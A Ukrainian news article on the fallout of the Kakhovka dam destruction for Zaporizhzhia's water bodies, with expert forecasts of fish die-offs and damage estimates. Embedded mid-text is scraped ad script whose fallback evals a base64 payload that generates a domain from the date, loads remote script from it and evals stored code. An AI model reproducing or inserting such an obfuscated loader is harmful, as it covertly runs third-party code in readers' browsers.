Названо найбільш песимістичні сценарії для водойм Запоріжжя після руйнування Каховської ГЕС (ФОТО, ВІДЕО)

Трагедія на Каховській ГЕС, яка сталася 6 червня, неминуче вплинула на стан річок і водоймищ у плавневій зоні біля Запоріжжя. За словами місцевої влади, процес обміління контролюється й поки що не спостерігається масової загибелі водних ресурсів. Однак є ділянки з високим потенційним ризиком обміління і екологічної катастрофи.

Детальний огляд про стан водоймищ у Запоріжжі і майбутні прогнози читайте в матеріалі Акценту.

Так, Запорізький рибоохоронний патруль попереджає, що руйнування греблі Каховської ГЕС може спричинити в сотні разів більших збитків екосистемі, ніж були взимку. Нагадаємо, що взимку окупанти відкривали шлюзи Каховської ГЕС і спускали воду, через що в акваторії Каховського водосховища спортерігалося обміління. Це вплинуло на нерест риби й призвело до загибелі водних ресурсів.

Поточний масштаб збитків від пошкодження греблі Каховської ГЕС для рибного господарства та іхтіофауни буде залежати від ступеня осушення Каховського водосховища.

Які прогнози щодо впливу руйнування греблі на водойми Запоріжжя?

Акцент поспілкувався з головним спеціалістом відділу іхтіології Запорізького рибоохоронного патруля Максимом Бронзюком, щодо можливих сценаріїв розвитку подій. Так, за оптимістичним прогнозом виток води з водосховища зупиниться на певній позначці. Однак за песимістичним прогнозом відбудеться повне осушення до корінного русла р. Дніпро.

Вже на даному етапі можна прогнозувати основні негативні наслідки. По-перше, загибель риби та інших об’єктів фауни водосховища від стрімкого осушення, у тому числі слід враховувати, що на даний час триває період нересту риби та раків, на мілководних ділянка, які швидко осушуються залишаються плідники риб, молодь та ікра. Частина риби залишиться у утворених ізольованих водоймах, де з високою вірогідністю загине внаслідок гіпоксії або подальшого осушення. По-друге, очікується кратне підвищення у подальшому природної смертності внаслідок суттєвих змін середовища, тієї частини іхтіофауни яка залишиться, — розповів Максим Бронзюк.

Відомо, що за попередніми підрахунками Інституту рибного господарства НААН України, загальні збитки від загибелі водних біоресурсів можуть бути оцінені у натуральному виражені близько 100 тис.тон. Для відновлення запасів основних промислових видів водних біоресурсів до стану, який передував катастрофі знадобиться від 10 (для плітки, судака) до 25 років (сазана).

Як наразі виглядають водойми Запоріжжя?

Станом на 9 червня, у нижньому б’єфі Дніпра в Запоріжжі продовжує спостерігатися зменшення рівня води. Лише за півдоби візуально можна оцінити падіння води на 70-80 см. Вода відступила від берега на 30-40 метрів, а місцями навіть ще більше. Подекуди можна побачити піщані острови посеред річки. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

За останні дні журналісти Акцента побували в різних місцях акваторії Дніпра та її заток у Запоріжжі, наслідки ви можете побачити на фото та відео нижче.

Центральний пляж у Запоріжжі 9 червня Фото пляжу на початку травня 2023 року

Ситуація плачевна, трагедія у людей. Дуже шкода тварин, і зоопарк, і заповідники. Росія безумовно винна у тому, що трапилося, навіть якщо це якась «халатність», — коментує події житель Запоріжжя Сергій, який спостерігав на Центральному пляжі за ситуацією.

Вранці у Запорізькій ОВА повідомлялося про те, що наразі загибелі водних біоресурсів не зафіксовано, але спостерігається продовження падіння рівня Каховського водосховища. Зокрема, розпочалося часткове «відшнуровування» проток та заплав Каховського водосховища.

Через це є ризик масової загибелі риби. Потенційно такими ділянками можуть бути Балабинська затока, озера в заплаві о. Хортиця, річки, що впадають у Каховське водосховище, вище за течією від гирла: р. Суха Московка, р. Мокра Московка, р. Конка, р. Янчекрак, р. Карачекрак, інші.

р. Кокань с.Біленьке

Нижче на відео можна побачити, як виглядає річка Мокра Московка в Запоріжжі після підриву греблі.

Зауважимо, що мор риби вже спостерігали у селі Мар’янське Дніпропетровської області. За повідомленням Дніпропетровського рибоохоронного патруля, внаслідок знищення Каховської ГЕС збитки для рибної галузі від загибелі лише дорослих особин можуть сягнути 95 тисяч тонн або близько 4 мільярдів гривень. Всього, за попередніми розрахунками, збитки від загибелі усіх біоресурсів складуть до 10,5 мільярдів гривень. (adsbygoogle = window.adsbygoogle || []).push({});

Названо населений пункт Запорізької області, який може залишитися без води через прорив Каховської ГЕС Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/nazvano-najbilsh-pesimistichni-stsenariyi-dlya-vodojm-zaporizhzhya-pislya-rujnuvannya-kahovskoyi-ges-foto-video/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top